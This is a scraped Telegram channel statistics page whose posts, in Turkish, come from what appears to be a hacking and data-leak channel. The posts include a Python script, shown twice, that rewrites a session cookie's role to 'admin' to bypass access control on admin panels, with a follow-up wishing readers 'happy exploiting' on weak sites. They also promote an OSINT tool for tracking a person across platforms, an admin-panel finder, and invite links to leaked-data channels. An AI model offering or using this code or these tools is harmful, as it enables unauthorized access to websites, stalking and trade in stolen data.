无数据
订阅者
-424 小时
+17 天
+5430 天
数据加载中...
吸引订阅者
五月 '25
五月 '25
+2
在0个频道中
四月 '25
+134
在17个频道中
Get PRO
三月 '25
+266
在13个频道中
Get PRO
二月 '25
+279
在3个频道中
Get PRO
一月 '250
在4个频道中
Get PRO
十二月 '240
在6个频道中
Get PRO
十一月 '24
+140
在7个频道中
Get PRO
十月 '24
+5
在2个频道中
| 日期 | 订阅者增长 | 提及 | 频道 | |
| 02 五月 | 0 | |||
| 01 五月 | +2 |
频道帖子
| 2 | Taklitler aslını yüceltir 🐦🔥 | 141 |
| 3 | Sıfırdan eğitim serisi gelsin mi? | 158 |
| 4 | SELAM DOSTLAR 🙌🏻
LOCKER'ın sizler için yazdığı Cookie Manipülasyonu ile Yetki Bypass kodunu bazı gelişmemiş sitelerde test ettik ve kodun bazı sitelerde çalıştığını fark ettik. Bu kodun hangi zaafiyetler de çalıştığını sizler için listeledik.
🔓 Zaafiyetleri aktarıyorum:
1.) Insecure Direct Object Reference (IDOR)
2.) Broken Access Control
3.) Insecure Cookie Handling
4.) Missing Authentication / Authorization
5.) Improper Session Management
6.) Lack of Input Validation / Server-side Validation
Evet, LOCKER'ın sizler için yazdığı bu bypass kodu genel olarak bu zaafiyetleri barındıran sitelerde çalışıyor. Tabii bu bir ihtimal bu zaafiyet olsa bile bazı durumlarda çalışmama gibi durumlar oluyor. Orasını da deneyerek bulacaksınız. Hepinize iyi sömürmeler 🧛🏻♂️ | 167 |
| 5 | OSINT Tool u sizce nasıl olmuş? Devamı gelsin mi? | 1 |
| 6 | Açık Kaynak Sosyal Medya İstihbarat Toolu 👍🏻
İyi kullanımlar dilerim ❤️ | 262 |
| 7 | Bu Jhon The Ripper benzeri çalışan bir sosyal medya OSINT aracıdır. Girdiğiniz kullanıcı adının hangi platformlarda bulunduğunu araştırmanıza yarar. Açık kaynaklı bir İstihbarat Tooludur. Açık kaynak atmamın nedeni dilerseniz daha fazla platform ekleyebilmeniz içindir. Siber Güvenlik Uzmanlarınında sıkça kullandığı Jhon The Ripper aracını Terminalde kurma zahmetinden kurtacak olan bu program birini İnternette takip etmek için bire bir. | 258 |
| 8 | nasılsınız | 1 |
| 9 | 👑 Her türlü verinin paylaşıldığı kanalımıza davetlisiniz 📌
https://t.me/+pnK8EyKEkyNmNDU0 | 1 |
| 10 | Bir süredir ilgilenemiyordum tekrar ilgileneceğim 👍 | 64 |
| 11 | https://t.me/+1C5h3mkDf7hiMjU0 | 65 |
| 12 | @swaregroup 🤝🤝🤝🤝 | 73 |
| 13 | Dostlar hiç emoji yok? Ayıp emeğimizin karşılığı bumu? | 1 |
| 14 | Güzel bir emoji spamda atacağım Toolu 👍🏻 | 30 |
| 15 | Selamün aleyküm dostlar bir OSINT projesi üzerinde çalışıyorum akşama doğru detayları ile kanalda paylaşmış olurum. Beklemede kalın bomba gibi bir araç gelecek 👍🏻🔥 | 112 |
| 16 | , | 1 |
| 17 | Web sitelerinde bulunan admin panellerini tespit etmek için kullanılan bir program.
- İyi kullanımlar dilerim. ❤️ | 360 |
| 18 | @swareleak dostlar data paylaşımları olacaktır bi önceki patlayan kanal baya bi ilgi görüyordu, umarım şimdide görür herkesi beklerim.... | 112 |
| 19 | import requests
giris_url = "Kullanici_girisi_url"
giris_verisi = {
"kullanici_adi": "senin_kullanici_adin",
"sifre": "senin_sifren",
}
oturum = requests.Session()
cevap = oturum.post(giris_url, data=giris_verisi)
çerezler = oturum.cookies.get_dict()
print(f"Orijinal Çerez: {çerezler}")
çerezler["rol"] = "admin"
print(f"Manipüle Edilmiş Çerez: {çerezler}")
admin_paneli_url = "admin_paneli_url"
cevap = requests.get(admin_paneli_url, cookies=çerezler)
if cevap.status_code == 200:
print("Yönetici paneline erişim sağlandı!")
print(cevap.text)
else:
print(f"Erişim sağlanamadı, durum kodu: {cevap.status_code}")
Bu bir Cookie manipüle etme kodudur. Sitenin size verdiği kimliği bir admin kimliğine çevirerek admin giriş bilgilerini Bypass etmenize yarar. Henüz test etmedim işin o kısmı artık sizde bunun yanında @Dev_Ech0 sizler için bir admin paneli bulma kodu hazırlıyor. Yani sitenizi belirleyin admin paneli bulmak için gerekli kodu Dev Echo sizler için sağlayacak. | 327 |
| 20 | import requests
giris_url = "Kullanici_girisi_url"
giris_verisi = {
"kullanici_adi": "senin_kullanici_adin",
"sifre": "senin_sifren",
}
oturum = requests.Session()
cevap = oturum.post(giris_url, data=giris_verisi)
çerezler = oturum.cookies.get_dict()
print(f"Orijinal Çerez: {çerezler}")
çerezler["rol"] = "admin"
print(f"Manipüle Edilmiş Çerez: {çerezler}")
admin_paneli_url = "admin_paneli_url"
cevap = requests.get(admin_paneli_url, cookies=çerezler)
if cevap.status_code == 200:
print("Yönetici paneline erişim sağlandı!")
print(cevap.text)
else:
print(f"Erişim sağlanamadı, durum kodu: {cevap.status_code}") | 1 |
